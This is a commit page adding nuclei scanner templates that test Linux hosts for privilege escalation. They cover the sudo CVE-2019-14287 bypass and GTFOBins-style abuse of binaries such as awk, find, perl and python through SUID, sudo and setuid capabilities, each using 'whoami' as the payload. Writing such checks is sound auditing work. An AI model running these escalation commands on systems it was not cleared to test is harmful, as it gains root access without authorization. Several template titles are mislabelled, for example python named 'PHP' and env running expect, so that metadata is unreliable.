daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

feat: added privesc

patch-1
Muhammad Daffa 2023-12-13 22:07:24 +07:00
parent 6d68c87f36
commit b2e48fb11f
75 changed files with 3441 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

38
code/cves/2023/CVE-2019-14287.yaml Normal file
View File

@ -0,0 +1,38 @@
id: CVE-2019-14287
info:
name: GameOver(lay) - Local Privilege Escalation in Ubuntu Kernel
author: princechaddha
severity: high
description: |
In Sudo before 1.8.28, an attacker with access to a Runas ALL sudoer account can bypass certain policy blacklists and session PAM modules, and can cause incorrect logging, by invoking sudo with a crafted user ID. For example, this allows bypass of !root configuration, and USER= logging, for a "sudo -u \#$((0xffffffff))" command.
reference:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14287
- https://www.exploit-db.com/exploits/47502
metadata:
verified: true
max-request: 2
vendor: canonical
product: ubuntu_linux
tags: cve,cve2019,sudo,ubuntu,linux,privesc,local
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
- engine:
- sh
- bash
source: |
sudo -u#-1 whoami
matchers:
- type: dsl
dsl:
- '!contains(code_1_response, "root")'
- 'contains(code_2_response, "root")'
condition: and

46
code/privilege-escalation/linux/binary/privilege-escalation-aa-exec.yaml Normal file
View File

@ -0,0 +1,46 @@
id: privilege-escalation-aa-exec
info:
name: aa-exec - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/aa-exec/
metadata:
verified: true
tags: code,linux,aa-exec,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
aa-exec whoami
#SUDO
- engine:
- sh
- bash
source: |
sudo aa-exec whoami
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or

46
code/privilege-escalation/linux/binary/privilege-escalation-ash.yaml Normal file
View File

@ -0,0 +1,46 @@
id: privilege-escalation-ash
info:
name: Ash - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/ash/
metadata:
verified: true
tags: code,linux,ash,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
ash -c 'whoami'
#SUDO
- engine:
- sh
- bash
source: |
sudo ash -c 'whoami'
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or

46
code/privilege-escalation/linux/binary/privilege-escalation-awk.yaml Normal file
View File

@ -0,0 +1,46 @@
id: privilege-escalation-awk
info:
name: awk - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/awk/
metadata:
verified: true
tags: code,linux,awk,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
awk 'BEGIN {system("whoami")}'
#SUDO
- engine:
- sh
- bash
source: |
sudo awk 'BEGIN {system("whoami")}'
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or

46
code/privilege-escalation/linux/binary/privilege-escalation-bash.yaml Normal file
View File

@ -0,0 +1,46 @@
id: privilege-escalation-bash
info:
name: Bash - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/bash/
metadata:
verified: true
tags: code,linux,bash,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
bash -c 'whoami'
#SUDO
- engine:
- sh
- bash
source: |
sudo bash -c 'whoami'
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or

46
code/privilege-escalation/linux/binary/privilege-escalation-cdist.yaml Normal file
View File

@ -0,0 +1,46 @@
id: privilege-escalation-cdist
info:
name: Cdist - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/cdist/
metadata:
verified: true
tags: code,linux,cdist,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
cdist shell -s whoami
#SUDO
- engine:
- sh
- bash
source: |
sudo cdist shell -s whoami
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or

46
code/privilege-escalation/linux/binary/privilege-escalation-choom.yaml Normal file
View File

@ -0,0 +1,46 @@
id: privilege-escalation-choom
info:
name: choom - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/choom/
metadata:
verified: true
tags: code,linux,choom,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
choom -n 0 whoami
#SUDO
- engine:
- sh
- bash
source: |
sudo choom -n 0 whoami
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or

46
code/privilege-escalation/linux/binary/privilege-escalation-cpulimit.yaml Normal file
View File

@ -0,0 +1,46 @@
id: privilege-escalation-cpulimit
info:
name: CPUlimit - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/cpulimit/
metadata:
verified: true
tags: code,linux,cpulimit,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
cpulimit -l 100 -f whoami
#SUDO
- engine:
- sh
- bash
source: |
sudo cpulimit -l 100 -f whoami
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or

46
code/privilege-escalation/linux/binary/privilege-escalation-csh.yaml Normal file
View File

@ -0,0 +1,46 @@
id: privilege-escalation-csh
info:
name: csh - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/csh/
metadata:
verified: true
tags: code,linux,csh,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
csh -c 'whoami'
#SUDO
- engine:
- sh
- bash
source: |
sudo csh -c 'whoami'
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or

46
code/privilege-escalation/linux/binary/privilege-escalation-csvtool.yaml Normal file
View File

@ -0,0 +1,46 @@
id: privilege-escalation-csvtool
info:
name: csvtool - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/csvtool/
metadata:
verified: true
tags: code,linux,csvtool,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
csvtool call 'whoami;false' /etc/passwd
#SUDO
- engine:
- sh
- bash
source: |
sudo csvtool call 'whoami;false' /etc/passwd
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or

46
code/privilege-escalation/linux/binary/privilege-escalation-dash.yaml Normal file
View File

@ -0,0 +1,46 @@
id: privilege-escalation-dash
info:
name: Dash - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/dash/
metadata:
verified: true
tags: code,linux,dash,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
dash -c 'whoami'
#SUDO
- engine:
- sh
- bash
source: |
sudo dash -c 'whoami'
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or

46
code/privilege-escalation/linux/binary/privilege-escalation-dc.yaml Normal file
View File

@ -0,0 +1,46 @@
id: privilege-escalation-dc
info:
name: dc - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/dc/
metadata:
verified: true
tags: code,linux,dc,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
dc -e '!whoami'
#SUDO
- engine:
- sh
- bash
source: |
sudo dc -e '!whoami'
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or

46
code/privilege-escalation/linux/binary/privilege-escalation-distcc.yaml Normal file
View File

@ -0,0 +1,46 @@
id: privilege-escalation-distcc
info:
name: distcc - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/distcc/
metadata:
verified: true
tags: code,linux,distcc,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
distcc whoami
#SUDO
- engine:
- sh
- bash
source: |
sudo distcc whoami
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or

46
code/privilege-escalation/linux/binary/privilege-escalation-elvish.yaml Normal file
View File

@ -0,0 +1,46 @@
id: privilege-escalation-elvish
info:
name: elvish - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/elvish/
metadata:
verified: true
tags: code,linux,elvish,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
elvish -c 'whoami'
#SUDO
- engine:
- sh
- bash
source: |
sudo elvish -c 'whoami'
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or

46
code/privilege-escalation/linux/binary/privilege-escalation-encscript.yaml Normal file
View File

@ -0,0 +1,46 @@
id: privilege-escalation-enscript
info:
name: enscript - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/enscript/
metadata:
verified: true
tags: code,linux,enscript,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
enscript /dev/null -qo /dev/null -I 'whoami >&2'
#SUDO
- engine:
- sh
- bash
source: |
sudo enscript /dev/null -qo /dev/null -I 'whoami >&2'
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or

46
code/privilege-escalation/linux/binary/privilege-escalation-env.yaml Normal file
View File

@ -0,0 +1,46 @@
id: privilege-escalation-env
info:
name: env - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/env/
metadata:
verified: true
tags: code,linux,env,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
expect -c 'spawn whoami;interact'
#SUDO
- engine:
- sh
- bash
source: |
sudo expect -c 'spawn whoami;interact'
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or

46
code/privilege-escalation/linux/binary/privilege-escalation-expect.yaml Normal file
View File

@ -0,0 +1,46 @@
id: privilege-escalation-expect
info:
name: expect - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/expect/
metadata:
verified: true
tags: code,linux,expect,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
expect -c 'spawn whoami;interact'
#SUDO
- engine:
- sh
- bash
source: |
sudo expect -c 'spawn whoami;interact'
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or

46
code/privilege-escalation/linux/binary/privilege-escalation-find.yaml Normal file
View File

@ -0,0 +1,46 @@
id: privilege-escalation-find
info:
name: find - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/find/
metadata:
verified: true
tags: code,linux,find,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
find . -exec whoami \; -quit
#SUDO
- engine:
- sh
- bash
source: |
sudo find . -exec whoami \; -quit
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or

46
code/privilege-escalation/linux/binary/privilege-escalation-fish.yaml Normal file
View File

@ -0,0 +1,46 @@
id: privilege-escalation-fish
info:
name: fish - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/fish/
metadata:
verified: true
tags: code,linux,fish,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
fish -c 'whoami'
#SUDO
- engine:
- sh
- bash
source: |
sudo fish -c 'whoami'
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or

46
code/privilege-escalation/linux/binary/privilege-escalation-flock.yaml Normal file
View File

@ -0,0 +1,46 @@
id: privilege-escalation-flock
info:
name: Flock - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/flock/
metadata:
verified: true
tags: code,linux,flock,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
flock -u / whoami
#SUDO
- engine:
- sh
- bash
source: |
sudo flock -u / whoami
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or

46
code/privilege-escalation/linux/binary/privilege-escalation-gawk.yaml Normal file
View File

@ -0,0 +1,46 @@
id: privilege-escalation-gawk
info:
name: gawk - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/gawk/
metadata:
verified: true
tags: code,linux,gawk,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
gawk 'BEGIN {system("whoami")}'
#SUDO
- engine:
- sh
- bash
source: |
sudo gawk 'BEGIN {system("whoami")}'
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or

46
code/privilege-escalation/linux/binary/privilege-escalation-grc.yaml Normal file
View File

@ -0,0 +1,46 @@
id: privilege-escalation-grc
info:
name: grc - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/grc/
metadata:
verified: true
tags: code,linux,grc,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
grc --pty whoami
#SUDO
- engine:
- sh
- bash
source: |
sudo grc --pty whoami
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or

46
code/privilege-escalation/linux/binary/privilege-escalation-ionice.yaml Normal file
View File

@ -0,0 +1,46 @@
id: privilege-escalation-ionice
info:
name: ionice - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/ionice/
metadata:
verified: true
tags: code,linux,ionice,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
ionice whoami
#SUDO
- engine:
- sh
- bash
source: |
sudo ionice whoami
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or

46
code/privilege-escalation/linux/binary/privilege-escalation-julia.yaml Normal file
View File

@ -0,0 +1,46 @@
id: privilege-escalation-julia
info:
name: Julia - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/julia/
metadata:
verified: true
tags: code,linux,julia,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
julia -e 'run(`whoami`)'
#SUDO
- engine:
- sh
- bash
source: |
sudo julia -e 'run(`whoami`)'
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or

46
code/privilege-escalation/linux/binary/privilege-escalation-lftp.yaml Normal file
View File

@ -0,0 +1,46 @@
id: privilege-escalation-lftp
info:
name: lftp - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/lftp/
metadata:
verified: true
tags: code,linux,lftp,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
lftp -c '!whoami'
#SUDO
- engine:
- sh
- bash
source: |
sudo lftp -c '!whoami'
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or

46
code/privilege-escalation/linux/binary/privilege-escalation-ltrace.yaml Normal file
View File

@ -0,0 +1,46 @@
id: privilege-escalation-ltrace
info:
name: ltrace - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/ltrace/
metadata:
verified: true
tags: code,linux,ltrace,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
ltrace -b -L whoami
#SUDO
- engine:
- sh
- bash
source: |
sudo ltrace -b -L whoami
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or

46
code/privilege-escalation/linux/binary/privilege-escalation-lua.yaml Normal file
View File

@ -0,0 +1,46 @@
id: privilege-escalation-lua
info:
name: lua - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/lua/
metadata:
verified: true
tags: code,linux,lua,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
lua -e 'os.execute("whoami")'
#SUDO
- engine:
- sh
- bash
source: |
sudo lua -e 'os.execute("whoami")'
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or

46
code/privilege-escalation/linux/binary/privilege-escalation-mawk.yaml Normal file
View File

@ -0,0 +1,46 @@
id: privilege-escalation-mawk
info:
name: mawk - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/mawk/
metadata:
verified: true
tags: code,linux,mawk,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
mawk 'BEGIN {system("whoami")}'
#SUDO
- engine:
- sh
- bash
source: |
sudo mawk 'BEGIN {system("whoami")}'
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or

46
code/privilege-escalation/linux/binary/privilege-escalation-multitime.yaml Normal file
View File

@ -0,0 +1,46 @@
id: privilege-escalation-multitime
info:
name: Multitime - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/multitime/
metadata:
verified: true
tags: code,linux,multitime,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
multitime whoami
#SUDO
- engine:
- sh
- bash
source: |
sudo multitime whoami
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or

46
code/privilege-escalation/linux/binary/privilege-escalation-mysql.yaml Normal file
View File

@ -0,0 +1,46 @@
id: privilege-escalation-mysql
info:
name: MySQL - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/mysql/
metadata:
verified: true
tags: code,linux,mysql,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
mysql -e '\! whoami'
#SUDO
- engine:
- sh
- bash
source: |
sudo mysql -e '\! whoami'
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or

46
code/privilege-escalation/linux/binary/privilege-escalation-nawk.yaml Normal file
View File

@ -0,0 +1,46 @@
id: privilege-escalation-nawk
info:
name: nawk - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/nawk/
metadata:
verified: true
tags: code,linux,nawk,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
nawk 'BEGIN {system("whoami")}'
#SUDO
- engine:
- sh
- bash
source: |
sudo nawk 'BEGIN {system("whoami")}'
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or

46
code/privilege-escalation/linux/binary/privilege-escalation-nice.yaml Normal file
View File

@ -0,0 +1,46 @@
id: privilege-escalation-nice
info:
name: Nice - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/nice/
metadata:
verified: true
tags: code,linux,nice,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
nice whoami
#SUDO
- engine:
- sh
- bash
source: |
sudo nice whoami
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or

54
code/privilege-escalation/linux/binary/privilege-escalation-node.yaml Normal file
View File

@ -0,0 +1,54 @@
id: privilege-escalation-node
info:
name: Node - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/node/
metadata:
verified: true
tags: code,linux,node,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
node -e 'require("child_process").spawn("whoami", {stdio: [0, 1, 2]})'
#SUDO
- engine:
- sh
- bash
source: |
sudo node -e 'require("child_process").spawn("whoami", {stdio: [0, 1, 2]})'
#Capabilities
- engine:
- sh
- bash
source: |
node -e 'process.setuid(0); require("child_process").spawn("whoami", {stdio: [0, 1, 2]})'
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
- 'contains(code_4_response, "root")'
condition: or

46
code/privilege-escalation/linux/binary/privilege-escalation-nsenter.yaml Normal file
View File

@ -0,0 +1,46 @@
id: privilege-escalation-nsenter
info:
name: Nsenter - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/nsenter/
metadata:
verified: true
tags: code,linux,nsenter,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
nsenter whoami
#SUDO
- engine:
- sh
- bash
source: |
sudo nsenter whoami
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or

54
code/privilege-escalation/linux/binary/privilege-escalation-perl.yaml Normal file
View File

@ -0,0 +1,54 @@
id: privilege-escalation-perl
info:
name: Perl - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/perl/
metadata:
verified: true
tags: code,linux,perl,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
perl -e 'exec "whoami";'
#SUDO
- engine:
- sh
- bash
source: |
sudo perl -e 'exec "whoami";'
#Capabilities
- engine:
- sh
- bash
source: |
perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "whoami";'
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
- 'contains(code_4_response, "root")'
condition: or

46
code/privilege-escalation/linux/binary/privilege-escalation-pexec.yaml Normal file
View File

@ -0,0 +1,46 @@
id: privilege-escalation-pexec
info:
name: pexec - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/pexec/
metadata:
verified: true
tags: code,linux,pexec,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
pexec whoami
#SUDO
- engine:
- sh
- bash
source: |
sudo pexec whoami
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or

54
code/privilege-escalation/linux/binary/privilege-escalation-php.yaml Normal file
View File

@ -0,0 +1,54 @@
id: privilege-escalation-php
info:
name: PHP - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/php/
metadata:
verified: true
tags: code,linux,php,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
php -r 'system("whoami");'
#SUDO
- engine:
- sh
- bash
source: |
sudo php -r 'system("whoami");'
#Capabilities
- engine:
- sh
- bash
source: |
php -r "posix_setuid(0); system("whoami");"
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
- 'contains(code_4_response, "root")'
condition: or

46
code/privilege-escalation/linux/binary/privilege-escalation-posh.yaml Normal file
View File

@ -0,0 +1,46 @@
id: privilege-escalation-posh
info:
name: posh - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/posh/
metadata:
verified: true
tags: code,linux,posh,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
posh -c 'whoami'
#SUDO
- engine:
- sh
- bash
source: |
sudo posh -c 'whoami'
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or

54
code/privilege-escalation/linux/binary/privilege-escalation-python.yaml Normal file
View File

@ -0,0 +1,54 @@
id: privilege-escalation-python
info:
name: PHP - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/python/
metadata:
verified: true
tags: code,linux,php,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
python -c 'import os; os.system("whoami")'
#SUDO
- engine:
- sh
- bash
source: |
sudo python -c 'import os; os.system("whoami")'
#Capabilities
- engine:
- sh
- bash
source: |
python -c 'import os; os.setuid(0); os.system("whoami")'
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
- 'contains(code_4_response, "root")'
condition: or

46
code/privilege-escalation/linux/binary/privilege-escalation-rake.yaml Normal file
View File

@ -0,0 +1,46 @@
id: privilege-escalation-rake
info:
name: Rake - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/rake/
metadata:
verified: true
tags: code,linux,rake,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
rake -p '`whoami 1>&0`'
#SUDO
- engine:
- sh
- bash
source: |
sudo rake -p '`whoami 1>&0`'
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or

46
code/privilege-escalation/linux/binary/privilege-escalation-rc.yaml Normal file
View File

@ -0,0 +1,46 @@
id: privilege-escalation-rc
info:
name: RC - Privilege Escalation
author: daffainfo
severity: high
reference: https://gtfobins.github.io/gtfobins/rc/
metadata:
verified: true
tags: code,linux,rc,privesc
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
#SUID
- engine:
- sh
- bash
source: |
rc -c 'whoami'
#SUDO
- engine:
- sh
- bash
source: |
sudo rc -c 'whoami'
matchers-condition: and
matchers:
- type: word
part: code_1_response
words:
- "root"
negative: true
- type: dsl
dsl:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or

46
code/privilege-escalation/linux/binary/privilege-escalation-rlwrap.yaml Normal file
View File

@ -0,0 +1,46 @@
id: privilege-escalation-rlwrap
info:
name: rlwrap - Privilege Escalation
author: daffainfo
